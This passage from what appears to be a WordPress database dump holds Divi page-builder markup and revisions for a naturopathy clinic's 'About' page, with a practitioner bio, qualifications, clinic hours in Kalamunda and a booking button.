header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Mel is a mother, tea lover, avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </span></p>\n<p><span style=\"font-family: Montserrat;\">She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </span></p>\n<p><span style=\"font-family: Montserrat;\">Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. </span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2023/11/Screenshot_20231123_121727_Instagram.jpg\" title_text=\"Screenshot_20231123_121727_Instagram\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#CCD4C8\" custom_padding=\"|20px||20px|false|false\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2023/11/Screenshot_20231123_121916_Instagram.jpg\" title_text=\"Screenshot_20231123_121916_Instagram\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"RGBA(0,0,0,0)\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||-5px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\"]<p><span style=\"font-family: Montserrat;\">Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting with clients, you’ll most likely find her brewing a cuppa, chasing after her three children or off bushwalking.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-size: large;\"><strong><span style=\"font-family: \'Playfair Display\';\">Certifications: </span></strong></span></p>\n<p><span style=\"font-family: Montserrat;\">Bachelor of Health Science (Naturopathy) </span></p>\n<p><span style=\"font-family: Montserrat;\">Bachelor of Science (Biological Science) </span></p>\n<p><span style=\"font-family: Montserrat;\"><span>Accredited G.E.M.M. Practitioner - Gut Ecology and Metabolic Modulation</span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; font-weight: normal; font-size: large;\"><strong>Professional memberships</strong>: </span></p>\n<p><span style=\"font-family: Montserrat;\">Australian Natural Therapist’s Association (ANTA)</span></p>\n<ul></ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" parallax=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#000000\" border_style_all=\"none\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#c7d3c0\" button_border_width=\"2px\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-4pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 11am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About','','publish','closed','closed','','about','','','2025-10-02 10:48:17','2025-10-02 02:48:17','',0,'https://verde.desidrivers.com.au/about/',0,'page','',0),(487,1,'2025-10-02 10:48:17','2025-10-02 02:48:17','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Mel is a mother, tea lover, avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </span></p>\n<p><span style=\"font-family: Montserrat;\">She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </span></p>\n<p><span style=\"font-family: Montserrat;\">Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. </span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2023/11/Screenshot_20231123_121727_Instagram.jpg\" title_text=\"Screenshot_20231123_121727_Instagram\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#CCD4C8\" custom_padding=\"|20px||20px|false|false\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2023/11/Screenshot_20231123_121916_Instagram.jpg\" title_text=\"Screenshot_20231123_121916_Instagram\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"RGBA(0,0,0,0)\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||-5px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\"]<p><span style=\"font-family: Montserrat;\">Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting with clients, you’ll most likely find her brewing a cuppa, chasing after her three children or off bushwalking.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-size: large;\"><strong><span style=\"font-family: \'Playfair Display\';\">Certifications: </span></strong></span></p>\n<p><span style=\"font-family: Montserrat;\">Bachelor of Health Science (Naturopathy) </span></p>\n<p><span style=\"font-family: Montserrat;\">Bachelor of Science (Biological Science) </span></p>\n<p><span style=\"font-family: Montserrat;\"><span>Accredited G.E.M.M. Practitioner - Gut Ecology and Metabolic Modulation</span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; font-weight: normal; font-size: large;\"><strong>Professional memberships</strong>: </span></p>\n<p><span style=\"font-family: Montserrat;\">Australian Natural Therapist’s Association (ANTA)</span></p>\n<ul></ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" parallax=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#000000\" border_style_all=\"none\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#c7d3c0\" button_border_width=\"2px\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-4pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 11am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About','','inherit','closed','closed','','27-revision-v1','','','2025-10-02 10:48:17','2025-10-02 02:48:17','',27,'https://verdenaturopathy.com.au/?p=487',0,'revision','',0),(483,1,'2025-09-16 18:06:58','2025-09-16 10:06:58','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Mel is a mother, tea lover, avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </span></p>\n<p><span style=\"font-family: Montserrat;\">She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </span></p>\n<p><span style=\"font-family: Montserrat;\">Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. </span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2023/11/Screenshot_20231123_121727_Instagram.jpg\" title_text=\"Screenshot_20231123_121727_Instagram\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#CCD4C8\" custom_padding=\"|20px||20px|false|false\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2023/11/Screenshot_20231123_121916_Instagram.jpg\" title_text=\"Screenshot_20231123_121916_Instagram\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"RGBA(0,0,0,0)\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||-5px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\"]<p><span style=\"font-family: Montserrat;\">Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting with clients, you’ll most likely find her brewing a cuppa, chasing after her three children or off bushwalking.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-size: large;\"><strong><span style=\"font-family: \'Playfair Display\';\">Certifications: </span></strong></span></p>\n<p><span style=\"font-family: Montserrat;\">Bachelor of Health Science (Naturopathy) </span></p>\n<p><span style=\"font-family: Montserrat;\">Bachelor of Science (Biological Science) </span></p>\n<p><span style=\"font-family: Montserrat;\"><span>Accredited G.E.M.M. Practitioner - Gut Ecology and Metabolic Modulation</span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; font-weight: normal; font-size: large;\"><strong>Professional memberships</strong>: </span></p>\n<p><span style=\"font-family: Montserrat;\">Australian Natural Therapist’s Association (ANTA)</span></p>\n<ul></ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" parallax=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" hover_enabled=\"0\" locked=\"off\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#000000\" border_style_all=\"none\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#c7d3c0\" button_border_width=\"2px\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About','','inherit','closed','closed','','27-revision-v1','','','2025-09-16 18:06:58','2025-09-16 10:06:58','',27,'https://verdenaturopathy.com.au/?p=483',0,'revision','',0),(441,1,'2025-04-01 